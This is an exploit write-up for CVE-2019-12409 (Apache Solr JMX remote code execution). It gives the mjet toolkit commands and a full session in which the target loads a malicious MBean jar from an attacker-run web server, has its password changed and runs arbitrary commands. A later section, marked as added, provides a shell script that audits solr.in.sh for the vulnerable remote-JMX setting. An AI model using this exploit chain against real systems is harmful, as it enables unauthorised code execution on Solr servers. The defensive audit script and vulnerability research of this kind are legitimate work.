[CVE-2019-12409] Apache Solr JMX RCE

Reference:
https://github.com/jas502n/CVE-2019-12409

Only versions 8.1.1 and 8.2.0 are affected.
Download:

git clone https://github.com/mogwailabs/mjet

Exploitation:

[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar  mjet.py 127.0.0.1  18983 install super_secret http://127.0.0.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  3
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://127.0.0.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET /vxcrtedo.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar  mjet.py 127.0.0.1  18983 command super_secret "id&&pwd&&ls"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: id&&pwd&&ls
uid=501(caiqiqi) gid=20(staff) groups=20(staff),501(access_bpf),701(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(com.apple.access_ssh-disabled),703(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
/Volumes/256G/Applications/solr/solr-8.2.0/server
README.txt
contexts
etc
lib
logs
modules
resources
scripts
solr
solr-webapp
start.jar


[+] Done
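
A defender-side check for this issue, as an added example that is not part of the original post: CVE-2019-12409 comes from the default solr.in.sh shipped with 8.1.1 and 8.2.0 setting ENABLE_REMOTE_JMX_OPTS="true", which exposes unauthenticated JMX on the RMI port (18983 in the session above). The function names are hypothetical and the file path is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): audit a solr.in.sh for the
# remote-JMX setting behind CVE-2019-12409.

# last_value FILE NAME: value of the last uncommented NAME=... assignment.
last_value() {
    sed -n -E "s/^[[:space:]]*(export[[:space:]]+)?$2=[\"']?([^\"'#[:space:]]*).*/\2/p" "$1" | tail -n 1
}

# audit_solr_jmx FILE: prints a verdict.
# Returns 0 if remote JMX is not enabled, 1 if it is, 2 if FILE is unreadable.
audit_solr_jmx() {
    file=$1
    if [ ! -r "$file" ]; then
        echo "ERROR: cannot read $file"
        return 2
    fi
    # Lower-case the value so "TRUE"/"True" are flagged too (conservative).
    jmx=$(last_value "$file" ENABLE_REMOTE_JMX_OPTS | tr '[:upper:]' '[:lower:]')
    port=$(last_value "$file" RMI_PORT)
    # 18983 is the JMX/RMI port seen in the session above; used when RMI_PORT is unset.
    [ -n "$port" ] || port=18983
    if [ "$jmx" = "true" ]; then
        echo "EXPOSED: $file enables remote JMX on RMI port $port"
        echo "  fix: set ENABLE_REMOTE_JMX_OPTS=\"false\" and restart Solr"
        return 1
    fi
    echo "OK: $file does not enable remote JMX (ENABLE_REMOTE_JMX_OPTS=${jmx:-unset})"
    return 0
}

# Stand-alone use: sh audit.sh /path/to/solr.in.sh
if [ $# -gt 0 ]; then
    audit_solr_jmx "$1"
fi
```

Run it against the solr.in.sh that each node actually loads; a later assignment in the file overrides an earlier one, which is why only the last uncommented value is reported.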